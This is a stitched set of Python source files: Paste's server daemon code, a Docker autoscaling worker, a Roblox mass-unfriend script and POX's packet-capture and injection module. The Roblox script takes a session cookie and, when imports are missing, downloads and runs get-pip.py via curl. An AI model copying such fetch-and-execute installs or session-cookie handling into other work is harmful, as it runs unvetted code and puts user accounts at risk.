if getattr(self.options, 'daemon', False):
if not self.options.pid_file:
self.options.pid_file = 'paster.pid'
if not self.options.log_file:
self.options.log_file = 'paster.log'
# Ensure the log file is writeable
if self.options.log_file:
try:
writeable_log_file = open(self.options.log_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to log file: %s' % ioe
raise BadCommand(msg)
writeable_log_file.close()
# Ensure the pid file is writeable
if self.options.pid_file:
try:
writeable_pid_file = open(self.options.pid_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to pid file: %s' % ioe
raise BadCommand(msg)
writeable_pid_file.close()
if getattr(self.options, 'daemon', False):
try:
self.daemonize()
except DaemonizeException as ex:
if self.verbose > 0:
print(str(ex))
return
if (self.options.monitor_restart and not
os.environ.get(self._monitor_environ_key)):
return self.restart_with_monitor()
if self.options.pid_file:
self.record_pid(self.options.pid_file)
if self.options.log_file:
stdout_log = LazyWriter(self.options.log_file, 'a')
sys.stdout = stdout_log
sys.stderr = stdout_log
logging.basicConfig(stream=stdout_log)
log_fn = app_spec
if log_fn.startswith('config:'):
log_fn = app_spec[len('config:'):]
elif log_fn.startswith('egg:'):
log_fn = None
if log_fn:
log_fn = os.path.join(base, log_fn)
self.logging_file_config(log_fn)
server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars)
app = loadapp(app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
print(msg)
def serve():
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
print('Exiting%s (-v to see traceback)' % msg)
except AttributeError as e:
# Capturing bad error response from paste
if str(e) == "'WSGIThreadPoolServer' object has no attribute 'thread_pool'":
import socket
raise socket.error(98, 'Address already in use')
else:
raise AttributeError(e)
if jython_monitor:
# JythonMonitor has to be ran from the main thread
threading.Thread(target=serve).start()
print('Starting Jython file monitor')
jython_monitor.periodic_reload()
else:
serve()
def daemonize(self):
pid = live_pidfile(self.options.pid_file)
if pid:
raise DaemonizeException(
"Daemon is already running (PID: %s from PID file %s)"
% (pid, self.options.pid_file))
if self.verbose > 0:
print('Entering daemon mode')
pid = os.fork()
if pid:
# The forked process also has a handle on resources, so we
# *don't* want proper termination of the process, we just
# want to exit quick (which os._exit() does)
os._exit(0)
# Make this the session leader
os.setsid()
# Fork again for good measure!
pid = os.fork()
if pid:
os._exit(0)
# @@: Should we set the umask and cwd now?
import resource # Resource usage information.
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
# Duplicate standard input to standard output and standard error.
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
def record_pid(self, pid_file):
pid = os.getpid()
if self.verbose > 1:
print('Writing PID %s to %s' % (pid, pid_file))
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
atexit.register(_remove_pid_file, pid, pid_file, self.verbose)
def stop_daemon(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file exists in %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print("Not a valid PID file in %s" % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print("PID in %s is not valid (deleting)" % pid_file)
try:
os.unlink(pid_file)
except (OSError, IOError) as e:
print("Could not delete: %s" % e)
return 2
return 1
for j in range(10):
if not live_pidfile(pid_file):
break
os.kill(pid, signal.SIGTERM)
time.sleep(1)
else:
print("failed to kill web process %s" % pid)
return 3
if os.path.exists(pid_file):
os.unlink(pid_file)
return 0
def show_status(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print('No PID in file %s' % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print('PID %s in %s is not running' % (pid, pid_file))
return 1
print('Server running in PID %s' % pid)
return 0
def restart_with_reloader(self):
        return self.restart_with_monitor(reloader=True)
def restart_with_monitor(self, reloader=False):
if self.verbose > 0:
if reloader:
print('Starting subprocess with file monitor')
else:
print('Starting subprocess with monitor parent')
while 1:
args = [self.quote_first_command_arg(sys.executable)] + sys.argv
new_environ = os.environ.copy()
if reloader:
new_environ[self._reloader_environ_key] = 'true'
else:
new_environ[self._monitor_environ_key] = 'true'
proc = None
try:
try:
_turn_sigterm_into_systemexit()
proc = subprocess.Popen(args, env=new_environ)
exit_code = proc.wait()
proc = None
except KeyboardInterrupt:
print('^C caught in monitor process')
if self.verbose > 1:
raise
return 1
finally:
if proc is not None and hasattr(os, 'kill'):
try:
os.kill(proc.pid, signal.SIGTERM)
except (OSError, IOError):
pass
if reloader:
# Reloader always exits with code 3; but if we are
# a monitor, any exit code will restart
if exit_code != 3:
return exit_code
if self.verbose > 0:
print('-' * 20, 'Restarting', '-' * 20)
def change_user_group(self, user, group):
if not user and not group:
return
import pwd
import grp
uid = gid = None
if group:
try:
gid = int(group)
group = grp.getgrgid(gid).gr_name
except ValueError:
import grp
try:
entry = grp.getgrnam(group)
except KeyError:
raise BadCommand(
"Bad group: %r; no such group exists" % group)
gid = entry.gr_gid
try:
uid = int(user)
user = pwd.getpwuid(uid).pw_name
except ValueError:
try:
entry = pwd.getpwnam(user)
except KeyError:
raise BadCommand(
"Bad username: %r; no such user exists" % user)
if not gid:
gid = entry.pw_gid
uid = entry.pw_uid
if self.verbose > 0:
print('Changing user to %s:%s (%s:%s)' % (
user, group or '(unknown)', uid, gid))
if hasattr(os, 'initgroups'):
os.initgroups(user, gid)
else:
os.setgroups([e.gr_gid for e in grp.getgrall()
if user in e.gr_mem] + [gid])
if gid:
os.setgid(gid)
if uid:
os.setuid(uid)
class LazyWriter(object):
"""
File-like object that opens a file lazily when it is first written
to.
"""
def __init__(self, filename, mode='w'):
self.filename = filename
self.fileobj = None
self.lock = threading.Lock()
self.mode = mode
def open(self):
if self.fileobj is None:
self.lock.acquire()
try:
if self.fileobj is None:
self.fileobj = open(self.filename, self.mode)
finally:
self.lock.release()
return self.fileobj
def write(self, text):
fileobj = self.open()
fileobj.write(text)
fileobj.flush()
def writelines(self, text):
fileobj = self.open()
fileobj.writelines(text)
fileobj.flush()
def flush(self):
self.open().flush()
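# LazyWriter defers opening the log file until the first write; the daemon
# code above assigns one instance to both sys.stdout and sys.stderr so the
# file is only created once output actually occurs.  Rough sketch (the path
# is hypothetical):
#   log = LazyWriter('/tmp/paster.log', 'a')
#   sys.stdout = sys.stderr = log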
def live_pidfile(pidfile):
"""(pidfile:str) -> int | None
Returns an int found in the named file, if there is one,
and if there is a running process with that process id.
Return None if no such process exists.
"""
pid = read_pidfile(pidfile)
if pid:
try:
os.kill(int(pid), 0)
return pid
except OSError as e:
if e.errno == errno.EPERM:
return pid
return None
def read_pidfile(filename):
if os.path.exists(filename):
try:
f = open(filename)
content = f.read()
f.close()
return int(content.strip())
except (ValueError, IOError):
return None
else:
return None
def _remove_pid_file(written_pid, filename, verbosity):
current_pid = os.getpid()
if written_pid != current_pid:
# A forked process must be exiting, not the process that
# wrote the PID file
return
if not os.path.exists(filename):
return
f = open(filename)
content = f.read().strip()
f.close()
try:
pid_in_file = int(content)
except ValueError:
pass
else:
if pid_in_file != current_pid:
print("PID file %s contains %s, not expected PID %s" % (
filename, pid_in_file, current_pid))
return
if verbosity > 0:
print("Removing PID file %s" % filename)
try:
os.unlink(filename)
return
except OSError as e:
# Record, but don't give traceback
print("Cannot remove PID file: %s" % e)
# well, at least lets not leave the invalid PID around...
try:
f = open(filename, 'w')
f.write('')
f.close()
except OSError as e:
            print('Stale PID left in file: %s (%s)' % (filename, e))
else:
print('Stale PID removed')
def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
"""
    This makes sure any bound ports are released.
    It does this by connecting to them until they give connection
    refused. Servers should call it like::
        import paste.script
        ensure_port_cleanup([('127.0.0.1', 80), ('127.0.0.1', 443)])
"""
atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries,
sleeptime=sleeptime)
def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
# Wait for the server to bind to the port.
import socket
import errno
for bound_address in bound_addresses:
for attempt in range(maxtries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(bound_address)
except socket.error as e:
if e.args[0] != errno.ECONNREFUSED:
raise
break
else:
time.sleep(sleeptime)
else:
raise SystemExit('Timeout waiting for port.')
sock.close()
def _turn_sigterm_into_systemexit():
"""
    Installs a SIGTERM handler that raises SystemExit, so receiving SIGTERM
    behaves like a normal interpreter exit.
"""
def handle_term(signo, frame):
raise SystemExit
signal.signal(signal.SIGTERM, handle_term)
# ---- from paste.script.command --------------------------------------
python_version = sys.version.splitlines()[0].strip()
parser = optparse.OptionParser(add_help_option=False,
# version='%s from %s (python %s)'
# % (dist, dist.location, python_version),
usage='%prog [paster_options] COMMAND [command_options]')
parser.add_option(
'-h', '--help',
action='store_true',
dest='do_help',
help="Show this help message")
parser.disable_interspersed_args()
# @@: Add an option to run this in another Python interpreter
commands = {
'serve': ServeCommand
}
def run(args=None):
if (not args and len(sys.argv) >= 2 and os.environ.get('_') and
sys.argv[0] != os.environ['_'] and os.environ['_'] == sys.argv[1]):
# probably it's an exe execution
args = ['exe', os.environ['_']] + sys.argv[2:]
if args is None:
args = sys.argv[1:]
options, args = parser.parse_args(args)
options.base_parser = parser
if options.do_help:
args = ['help'] + args
if not args:
print('Usage: %s COMMAND' % sys.argv[0])
args = ['help']
command_name = args[0]
if command_name not in commands:
command = NotFoundCommand
else:
command = commands[command_name]
invoke(command, command_name, options, args[1:])
def invoke(command, command_name, options, args):
try:
runner = command(command_name)
exit_code = runner.run(args)
except BadCommand as e:
print(e)
exit_code = e.exit_code
sys.exit(exit_code)
|
admin_worker.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from docker_client import DockerAPIClient
from pika import BlockingConnection, URLParameters
from pika.exceptions import AMQPConnectionError
from time import sleep
from threading import Thread
from functools import partial
from os import environ
from os.path import join, dirname
from dotenv import load_dotenv
from datetime import datetime, timedelta
from rabbimq_client import RabbitMQClient
from json import loads
from copy import copy
from ast import literal_eval
dotenv_path = join(dirname(__file__), '.env')
load_dotenv(dotenv_path)
class BColors:
GREY = '\u001b[37;1m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
ENDC = "\u001b[0m"
class AdminWorker(object):
def __init__(self, reconection_time=10, prefetch_count=1, debug=True):
self._amqp_url = environ['AMQP_URL']
self._task_queue = environ['TASK_QUEUE']
self._keep_alive_queue = environ['KEEP_ALIVE_QUEUE']
self._reconection_time = int(environ['AMQP_TIMEOUT']) # 10 seconds
self._last_timestamps = dict()
        self._lights = {  # load is classified as COLOR when it is below the given threshold
'GREY': float(environ['GREY_LIGHT']), # Means IDLE
'GREEN': float(environ['GREEN_LIGHT']),
'YELLOW': float(environ['YELLOW_LIGHT']),
'RED': float(environ['RED_LIGHT'])
}
self._prefetch_count = prefetch_count
self._qty_task = int(environ['QTY_TASK'])
self._max_scale = int(environ['MAX_SCALE'])
self._min_scale = int(environ['MIN_SCALE'])
self._service_monitor = environ['SERVICE_MONITOR']
self._service_dealer = environ['SERVICE_DEALER']
self._step_batch_dealer = int(environ['STEP_BATCH_DEALER'])
self._min_batch_dealer = int(environ['MIN_BATCH_DEALER'])
self._max_batch_dealer = int(environ['MAX_BATCH_DEALER'])
self._debug = debug
self._refresh_rate = float(environ['REFRESH_RATE'])
self._max_timeout = timedelta(seconds=int(environ['MAX_TIMEOUT']))
self._rabbitmq_client = RabbitMQClient(
self,
amqp_url = self._amqp_url,
queues = {
self._task_queue: {
"durable": True,
"exclusive": False,
"auto_delete": False,
"auto_ack": False,
"callback": None
},
self._keep_alive_queue: {
"durable": True,
"exclusive": False,
"auto_delete": False,
"auto_ack": True,
"callback": "callback_keep_alive_queue"
}
},
reconection_time = self._reconection_time,
prefetch_count = self._prefetch_count,
debug = self._debug
)
def callback_keep_alive_queue(self, ch, method, properties, body):
data = loads(body)
worker = data['id']
if (self._docker_client.get_container(worker)):
self._last_timestamps[worker] = data['timestamp']
def update_queue_data(self):
message_count = self._rabbitmq_client.message_count(self._task_queue)
if (message_count is not None):
self._current_state['replica_count'] = self._docker_client.get_service_replica_count(service_name=self._service_monitor)
self._current_state['msg_count'] = message_count
self._current_state['load'] = self._current_state['msg_count'] / (self._current_state['replica_count'][0] * self._qty_task)
self._current_state['ligth'] = self.get_ligth(self._current_state['load'])
def get_ligth(self, load):
for light in list(self._lights):
if (load < self._lights[light]):
return light
return 'RED'
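    # get_ligth relies on the insertion order of self._lights (GREY, GREEN,
    # YELLOW, RED) and returns the first color whose threshold is above the
    # current load.  With hypothetical thresholds GREY=0.1, GREEN=0.5 and
    # YELLOW=0.9, a load of 0.05 maps to GREY (idle), 0.3 to GREEN, 0.7 to
    # YELLOW, and anything higher ends up RED.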
def response_to_light(self):
count = 0
while (True):
self.update_queue_data()
print(BColors.__dict__[self._current_state['ligth']] + f" [+] Workers State - Work Load: {self._current_state['load']:.2f} - Replicas: {'/'.join([str(i) for i in self._current_state['replica_count']])} - Msg count: {self._current_state['msg_count']}" + BColors.ENDC)
print(f" [#] {datetime.now().strftime('%H:%M:%S.%f')} {self._current_state['load']:.2f} {self._current_state['ligth']}")
if (self._current_state['ligth'] == 'GREY'):
# Our workers are idle so we kill some
count += 1
if (count >= 3):
self.remove_worker()
count = 0
elif (self._current_state['ligth'] == 'GREEN'):
# Our workers are good so we do nothing
count = 0
elif (self._current_state['ligth'] == 'YELLOW'):
# Our workers are busy so we create more
count = 0
self.create_worker()
elif (self._current_state['ligth'] == 'RED'):
# Our workers are very busy so we create a lot more (2x)
count = 0
self.create_worker(2)
sleep(self._refresh_rate)
def create_worker(self, scale_step=1):
scale_to = self._current_state['replica_count'][1] + scale_step
if (scale_to <= self._max_scale):
if (self._debug):
print(f"Scaling up {self._service_monitor} from {self._current_state['replica_count'][1]} to {scale_to} replicas")
self._docker_client.scale_service(service_name=self._service_monitor, replica_count=scale_to)
else:
self.update_delivery(-1*self._step_batch_dealer)
def update_delivery(self, batch=100, wait=None):
envs = self._docker_client.get_service_env(self._service_dealer)
if envs is None: return
if self._min_batch_dealer <= literal_eval(envs['BATCH']) + batch <= self._max_batch_dealer:
if (self._debug): print(f"Updating {self._service_dealer}. BATCH += {batch} and WAIT += {wait} ")
self._docker_client.update_service_env_add(
self._service_dealer,
new_env= {
'BATCH': batch,
'WAIT': wait,
}
)
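    # update_delivery only touches the dealer service when the adjusted BATCH
    # stays inside [MIN_BATCH_DEALER, MAX_BATCH_DEALER]; e.g. with hypothetical
    # limits of 100..1000 and a current BATCH of 100, a call with batch=-100
    # is silently skipped because the result would fall below the minimum.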
def remove_worker(self, scale_step=1):
scale_to = self._current_state['replica_count'][1] - scale_step
if (scale_to >= self._min_scale):
if (self._debug):
print(f"Scaling down {self._service_monitor} from {self._current_state['replica_count'][1]} to {scale_to} replicas")
self._docker_client.scale_service(service_name=self._service_monitor, replica_count=scale_to)
def calculate_timeout_workers(self):
        # Check whether any worker has gone too long without responding
        while (True):  # iterate over the workers and their last-seen timestamps
p = None
if (len(self._last_timestamps) > 0 and self._debug):
p = f"{'-'*80}\n{BColors.GREY}\tWORKER\t\tLAST SEEN\t\t\tSTATUS\t{BColors.ENDC}\n"
last_timestamps_tmp = copy(self._last_timestamps)
removed_workers = []
for worker, timestamp in last_timestamps_tmp.items():
timeout_worker = datetime.strptime(timestamp, '%Y-%m-%d %H:%M:%S.%f')
diff = datetime.now() - timeout_worker
container = self._docker_client.get_container(worker)
if (not container):
removed_workers.append((worker, 0))
else:
if (diff > self._max_timeout):
status = ('NOT RESPONDING', BColors.RED)
if (container):
container.remove()
removed_workers.append((worker, 1))
                    elif (diff > self._max_timeout/2):  # more than half of the timeout has elapsed
status = ('WARNING', BColors.YELLOW)
else:
status = ('OK', BColors.GREEN)
if (self._debug):
p += f"\t{status[1]}{worker}\t{timestamp}\t{status[0]}\t{BColors.ENDC}\n"
if (self._debug and p is not None):
print(p)
for removed_worker in removed_workers:
self._last_timestamps.pop(removed_worker[0])
if (self._debug and removed_worker[1] == 1):
print(f' [!] Worker {removed_worker[0]} is NOT responding.')
print(f' [+] Worker {removed_worker[0]} removed.')
sleep(self._refresh_rate)
def start(self):
t3 = Thread(target=self._rabbitmq_client.start)
t3.start()
self._docker_client = DockerAPIClient()
self._current_state = {
'msg_count': -1,
'ligth': 'GREEN',
'load': 0.4,
'replica_count': self._docker_client.get_service_replica_count(service_name=self._service_monitor)
}
t1 = Thread(target=self.response_to_light)
t1.start()
t2 = Thread(target=self.calculate_timeout_workers)
t2.start()
def main():
"""Main entry point to the program."""
admin = AdminWorker()
admin.start()
if __name__ == '__main__':
main()
|
main.py
|
import subprocess, threading, time, os
try:
import requests
from termcolor import cprint
except ImportError:
try:
import pip
except ImportError:
os.system("")
print("[", end="")
print('\033[31m'+" ERROR ", "red", end="")
print("] " , end="")
print('\033[31m'+"Pip not installed. Installing now...")
subprocess.call("curl https://bootstrap.pypa.io/get-pip.py --output get-pip.py", shell=True)
time.sleep(5)
os.system("get-pip.py")
print("[", end="")
print('\033[31m'+" ERROR ", "red", end="")
print("] " , end="")
print('\033[31m'+"Packages not installed. Installing now...")
subprocess.call("pip install termcolor", shell=True)
subprocess.call("pip install requests", shell=True)
finally:
import requests
from termcolor import cprint
# Made by Ice Bear#0167
def getXsrf(cookie):
xsrfRequest = requests.post("https://auth.roblox.com/v2/logout", cookies={
'.ROBLOSECURITY': cookie
})
return xsrfRequest.headers["x-csrf-token"]
def clear():
if os.name == 'nt':
os.system("cls")
else:
os.system("clear")
class Unfriend:
global headers
global cookie
def unfriend(_):
print("[", end="")
cprint(" UNFRIENDER ", "magenta", end="")
print("] " , end="")
cprint("Unfriending friends....", "magenta")
friends = requests.get(f"https://friends.roblox.com/v1/users/{userid}/friends", cookies={'.ROBLOSECURITY': str(cookie)}).json()['data']
friendIds = [friend['id'] for friend in friends]
for i in friendIds:
time.sleep(0.1)
print(requests.post(f"https://friends.roblox.com/v1/users/{i}/unfriend",cookies={'.ROBLOSECURITY': str(cookie)}, headers=headers).text)
print("[", end="")
cprint(" UNFRIENDER ", "magenta", end="")
print("] " , end="")
cprint(f"Unfriended {i}!", "magenta")
print("[", end="")
cprint(" UNFRIENDER ", "magenta", end="")
print("] " , end="")
cprint("Unfriended All!", "magenta")
def check(_):
global cookie
global message
print("[", end="")
cprint(" UNFRIENDER ", "magenta", end="")
print("] " , end="")
cprint("Enter Your Cookie Below:", 'magenta')
cookie = input("> ")
return requests.get('https://api.roblox.com/currency/balance', cookies={'.ROBLOSECURITY': str(cookie)})
def start(_):
global headers
global userid
global goOn
os.system("")
check = Unfriend.check()
if check.status_code ==200:
headers={'X-CSRF-TOKEN': getXsrf(cookie)}
userdata = requests.get("https://users.roblox.com/v1/users/authenticated",cookies={".ROBLOSECURITY":cookie}).json() #get user data
userid = userdata['id'] #user id
clear()
threading.Thread(target=Unfriend.unfriend).start()
else:
print("[", end="")
cprint(" ERROR ", "red", end="")
print("] " , end="")
cprint("Invalid Cookie", 'red')
time.sleep(1.4)
clear()
Unfriend.check()
if __name__ == '__main__':
Unfriend = Unfriend()
Unfriend.start()
# Coded by Ice Bear#0167
|
__init__.py
|
# Copyright 2011,2013 James McCauley
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
enabled = False
try:
import platform
import importlib
_module = 'pox.lib.pxpcap.%s.pxpcap' % (platform.system().lower(),)
pcapc = importlib.import_module(_module)
enabled = True
except:
# Try generic...
try:
import pxpcap as pcapc
enabled = True
except:
# We can at least import the rest
pass
from pox.lib.addresses import IPAddr, EthAddr, IPAddr6
import parser
from threading import Thread, Lock
import pox.lib.packet as pkt
import copy
# pcap's filter compiling function isn't threadsafe, so we use this
# lock when compiling filters.
_compile_lock = Lock()
class PCap (object):
use_select = False # Falls back to non-select
@staticmethod
def get_devices ():
def ip (addr):
if addr is None: return None
return IPAddr(addr, networkOrder=True)
def ip6 (addr):
if addr is None: return None
return IPAddr6.from_raw(addr)
def link (addr):
if addr is None: return None
if len(addr) != 6: return None
return EthAddr(addr)
devs = pcapc.findalldevs()
out = {}
for d in devs:
addrs = {}
n = {'desc':d[1],'addrs':addrs}
out[d[0]] = n
for a in d[2]:
if a[0] == 'AF_INET':
na = {}
addrs[a[0]] = na
na['addr'] = ip(a[1])
na['netmask'] = ip(a[2])
na['broadaddr'] = ip(a[3])
na['dstaddr'] = ip(a[4])
elif a[0] == 'AF_INET6':
na = {}
addrs[a[0]] = na
na['addr'] = ip6(a[1])
na['netmask'] = ip6(a[2])
na['broadaddr'] = ip6(a[3])
na['dstaddr'] = ip6(a[4])
elif a[0] == 'AF_LINK':
na = {}
addrs[a[0]] = na
na['addr'] = link(a[1])
na['netmask'] = link(a[2])
na['broadaddr'] = link(a[3])
na['dstaddr'] = link(a[4])
elif a[0] == 'AF_PACKET':
addrs[a[0]] = {'addr':link(a[1])}
elif a[0] == 'ethernet':
addrs[a[0]] = {'addr':link(a[1])}
return out
@staticmethod
def get_device_names ():
return [d[0] for d in pcapc.findalldevs()]
def __init__ (self, device = None, promiscuous = True, period = 10,
start = True, callback = None, filter = None,
use_bytearray = False, **kw):
"""
Initialize this instance
use_bytearray: specifies capturing to bytearray buffers instead of bytes
"""
if filter is not None:
self.deferred_filter = (filter,)
else:
self.deferred_filter = None
self.packets_received = 0
self.packets_dropped = 0
self._thread = None
self.pcap = None
self.promiscuous = promiscuous
self.device = None
self.use_bytearray = use_bytearray
self.period = period
self.netmask = IPAddr("0.0.0.0")
self._quitting = False
self.addresses = {}
if callback is None:
self.callback = self.__class__._handle_rx
else:
self.callback = callback
for k,v in kw.items():
assert not hasattr(self, k)
setattr(self, k, v)
if device is not None:
self.open(device)
if self.pcap is not None:
if start:
self.start()
def _handle_rx (self, data, sec, usec, length):
pass
def open (self, device, promiscuous = None, period = None,
incoming = True, outgoing = False):
assert self.device is None
self.addresses = self.get_devices()[device]['addrs']
if 'AF_INET' in self.addresses:
self.netmask = self.addresses['AF_INET'].get('netmask')
if self.netmask is None: self.netmask = IPAddr("0.0.0.0")
#print "NM:",self.netmask
#print self.addresses['AF_LINK']['addr']
self.device = device
if period is not None:
self.period = period
if promiscuous is not None:
self.promiscuous = promiscuous
self.pcap = pcapc.open_live(device, 65535,
1 if self.promiscuous else 0, self.period)
pcapc.setdirection(self.pcap, incoming, outgoing)
self.packets_received = 0
self.packets_dropped = 0
if self.deferred_filter is not None:
self.set_filter(*self.deferred_filter)
self.deferred_filter = None
def set_direction (self, incoming, outgoing):
pcapc.setdirection(self._pcap, incoming, outgoing)
def set_nonblocking (self, nonblocking = True):
pcapc.setnonblock(self._pcap, 1 if nonblocking else 0)
def set_blocking (self, blocking = True):
self.set_nonblocking(nonblocking = not blocking)
@property
def blocking (self):
return False if pcapc.getnonblock(self._pcap) else True
@blocking.setter
def blocking (self, value):
self.set_blocking(value)
def next_packet (self, allow_threads = True):
"""
Get next packet
Returns tuple with:
data, timestamp_seconds, timestamp_useconds, total length, and
the pcap_next_ex return value -- 1 is success
"""
return pcapc.next_ex(self._pcap, bool(self.use_bytearray), allow_threads)
def _select_thread_func (self):
try:
import select
fd = [self.fileno()]
except:
# Fall back
self._thread_func()
return
self.blocking = False
while not self._quitting:
rr,ww,xx = select.select(fd, [], fd, 2)
if xx:
# Apparently we're done here.
break
if rr:
r = self.next_packet(allow_threads = False)
if r[-1] == 0: continue
if r[-1] == 1:
self.callback(self, r[0], r[1], r[2], r[3])
else:
break
self._quitting = False
self._thread = None
def _thread_func (self):
while not self._quitting:
pcapc.dispatch(self.pcap,100,self.callback,self,bool(self.use_bytearray),True)
self.packets_received,self.packets_dropped = pcapc.stats(self.pcap)
self._quitting = False
self._thread = None
def _handle_GoingDownEvent (self, event):
self.close()
def start (self):
assert self._thread is None
from pox.core import core
core.addListeners(self, weak=True)
if self.use_select:
self._thread = Thread(target=self._select_thread_func)
else:
self._thread = Thread(target=self._thread_func)
#self._thread.daemon = True
self._thread.start()
def stop (self):
t = self._thread
if t is not None:
self._quitting = True
pcapc.breakloop(self.pcap)
t.join()
def close (self):
if self.pcap is None: return
self.stop()
pcapc.close(self.pcap)
self.pcap = None
def __del__ (self):
self.close()
@property
def _pcap (self):
if self.pcap is None:
raise RuntimeError("PCap object not open")
return self.pcap
def inject (self, data):
if isinstance(data, pkt.ethernet):
data = data.pack()
if not isinstance(data, (bytes,bytearray)):
data = bytes(data) # Give it a try...
return pcapc.inject(self.pcap, data)
def set_filter (self, filter, optimize = True):
if self.pcap is None:
self.deferred_filter = (filter, optimize)
return
if isinstance(filter, str):
filter = Filter(filter, optimize, self.netmask.toSignedN(),
pcap_obj=self)
elif isinstance(filter, Filter):
pass
else:
raise RuntimeError("Filter must be string or Filter object")
pcapc.setfilter(self.pcap, filter._pprogram)
def fileno (self):
if self.pcap is None:
raise RuntimeError("PCap object not open")
r = pcapc.get_selectable_fd(self.pcap)
if r == -1:
raise RuntimeError("Selectable FD not available")
return r
def __str__ (self):
return "PCap(device=%s)" % (self.device)
class Filter (object):
def __init__ (self, filter, optimize = True, netmask = None,
pcap_obj = None, link_type = 1, snaplen = 65535):
self._pprogram = None
if netmask is None:
netmask = 0
elif isinstance(netmask, IPAddr):
netmask = netmask.toSignedN()
delpc = False
if pcap_obj is None:
delpc = True
pcap_obj = pcapc.open_dead(link_type, snaplen)
if isinstance(pcap_obj, PCap):
pcap_obj = pcap_obj.pcap
with _compile_lock:
self._pprogram = pcapc.compile(pcap_obj, filter,
1 if optimize else 0, netmask)
if delpc:
pcapc.close(pcap_obj)
def __del__ (self):
if self._pprogram:
pcapc.freecode(self._pprogram)
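# A Filter can also be built up front and handed to an open capture; rough
# sketch (the device name is hypothetical):
#   cap = PCap('eth0', start=False)
#   cap.set_filter(Filter('tcp port 80', pcap_obj=cap))
#   cap.start()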
try:
_link_type_names = {}
for k,v in copy.copy(pcapc.__dict__).iteritems():
if k.startswith("DLT_"):
_link_type_names[v] = k
except:
pass
def get_link_type_name (dlt):
return _link_type_names.get(dlt, "<Unknown " + str(dlt) + ">")
def test (interface = "en1"):
""" Test function """
global drop,total,bytes_got,bytes_real,bytes_diff
drop = 0
total = 0
bytes_got = 0
bytes_real = 0
bytes_diff = 0
def cb (obj, data, sec, usec, length):
global drop,total,bytes_got,bytes_real,bytes_diff
#print ">>>",data
t,d = pcapc.stats(obj.pcap)
bytes_got += len(data)
bytes_real += length
nbd = bytes_real - bytes_got
if nbd != bytes_diff:
bytes_diff = nbd
print "lost bytes:",nbd
if t > total:
total = t + 500
print t,"total"
if d > drop:
drop = d
print d, "dropped"
p = pkt.ethernet(data)
ip = p.find('ipv4')
if ip:
print ip.srcip,"\t",ip.dstip, p
print "\n".join(["%i. %s" % x for x in
enumerate(PCap.get_device_names())])
if interface.startswith("#"):
interface = int(interface[1:])
interface = PCap.get_device_names()[interface]
print "Interface:",interface
p = PCap(interface, callback = cb,
filter = "icmp")
#[icmptype] != icmp-echoreply")
#filter = "ip host 74.125.224.148")
p.set_direction(True, True)
def ping (eth='00:18:02:6e:ce:55', ip='192.168.0.1'):
e = pkt.ethernet()
e.src = p.addresses['ethernet']['addr'] or '02:00:00:11:22:33'
e.dst = EthAddr(eth)
e.type = e.IP_TYPE
ipp = pkt.ipv4()
ipp.protocol = ipp.ICMP_PROTOCOL
ipp.srcip = p.addresses['AF_INET']['addr']
ipp.dstip = IPAddr(ip)
icmp = pkt.icmp()
icmp.type = pkt.ICMP.TYPE_ECHO_REQUEST
icmp.payload = "PingPing" * 6
ipp.payload = icmp
e.payload = ipp
p.inject(e)
def broadcast ():
ping('ff:ff:ff:ff:ff:ff','255.255.255.255')
import code
code.interact(local=locals())
def no_select ():
"""
Sets default PCap behavior to not try to use select()
"""
PCap.use_select = False
def do_select ():
"""
Sets default PCap behavior to try to use select()
"""
PCap.use_select = True
def interfaces (verbose = False):
"""
Show interfaces
"""
if not verbose:
print "\n".join(["%i. %s" % x for x in
enumerate(PCap.get_device_names())])
else:
import pprint
print pprint.pprint(PCap.get_devices())
from pox.core import core
core.quit()
def launch (interface, no_incoming=False, no_outgoing=False):
"""
pxshark -- prints packets
"""
def cb (obj, data, sec, usec, length):
p = pkt.ethernet(data)
print p.dump()
if interface.startswith("#"):
interface = int(interface[1:])
interface = PCap.get_device_names()[interface]
p = PCap(interface, callback = cb, start=False)
p.set_direction(not no_incoming, not no_outgoing)
#p.use_select = False
p.start()
|
nuage_gluon_shim.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016, Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
